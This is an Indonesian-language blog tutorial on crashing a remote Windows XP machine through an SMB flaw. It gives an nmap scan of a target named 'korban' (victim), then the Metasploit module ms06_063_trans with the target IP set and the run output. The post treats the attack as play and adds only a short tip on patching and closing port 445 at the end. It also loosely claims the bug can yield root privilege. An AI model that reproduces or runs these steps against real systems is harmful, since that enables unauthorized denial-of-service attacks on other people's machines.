Windows xp remote bsod

Kali ini kita sama – sama belajar teknik serangan akibat bug yang terdapat pada smb (server message block) yang di gunakan pada windows xp. dengan memaanfatkan bug tersebut kita dapat melakukan exploitasi secara remote baik mendapatkan privilege root maupun serangan berbahaya lainya… 😀  untuk lebih jelasnya mengenai smb silakan searching di google.

Persiapan yang harus dilakukan adalah menggunakan script atau tools yang di buat oleh jutaan hacker atau jika anda mampu membuatnya monggo dan jangan lupa di share juga yah hehehehe 🙂

Disini kita menggunakan tools metasploit framework, tools ini powerfull banget banyak modulenya tinggal kreatifitas aja.. B-)

let’s play.. :ar!

scan target, gunakan NMAP. tujuannya buat mengetahui apakah korban membuka pintu masuk 445.

 root@abi71:~# nmap -A 192.168.1.3 -PN

Starting Nmap 5.00 ( http://nmap.org ) at 2010-07-17 16:18 WIT
Interesting ports on 192.168.1.3:
Not shown: 996 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
2869/tcp closed unknown
3389/tcp open   microsoft-rdp Microsoft Terminal Service
MAC Address: 00:0C:29:89:D4:8D 
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3
Network Distance: 1 hop
Service Info: OS: Windows

Host script results:
|_ nbstat: NetBIOS name: korban , NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:89:d4:8d
|  smb-os-discovery: Windows XP
|  LAN Manager: Windows 2000 LAN Manager
|  Name: korban
|_ System time: 2010-07-17 16:18:40 UTC+7

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.44 seconds

diatas terlihat bahwa korban menggunakan os windows xp, dan membuka pintu masuknya.

gunakan module dos/windows/smb/ms06_063_trans

 msf > use dos/windows/smb/ms06_063_trans

masukan ip target, set RHOST ip_target

 msf auxiliary(ms06_063_trans) > set RHOST 192.168.1.3
RHOST => 192.168.1.3

kemudian run..

 msf auxiliary(ms06_063_trans) > run

[*] Connecting to the target system...
[*] Sending bad SMB transaction request 1...
[*] Sending bad SMB transaction request 2...
[*] Sending bad SMB transaction request 3...
[*] Sending bad SMB transaction request 4...
[*] Sending bad SMB transaction request 5...
[*] Auxiliary module execution completed

dijamin korban bakal langsung bsod (blue screen of the death) hehehe 😀

agar anda tidak menjadi korban teknik serangan yang memaanfatkan smb ini, pastikan bahwa windows xp anda sudah di patched dengan update terbaru. jangan lupa juga matikan layanan yang menggunakan port 445 dengan kata lain tutup port tersebut.

Advertisements
This entry was posted in Metasploit. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s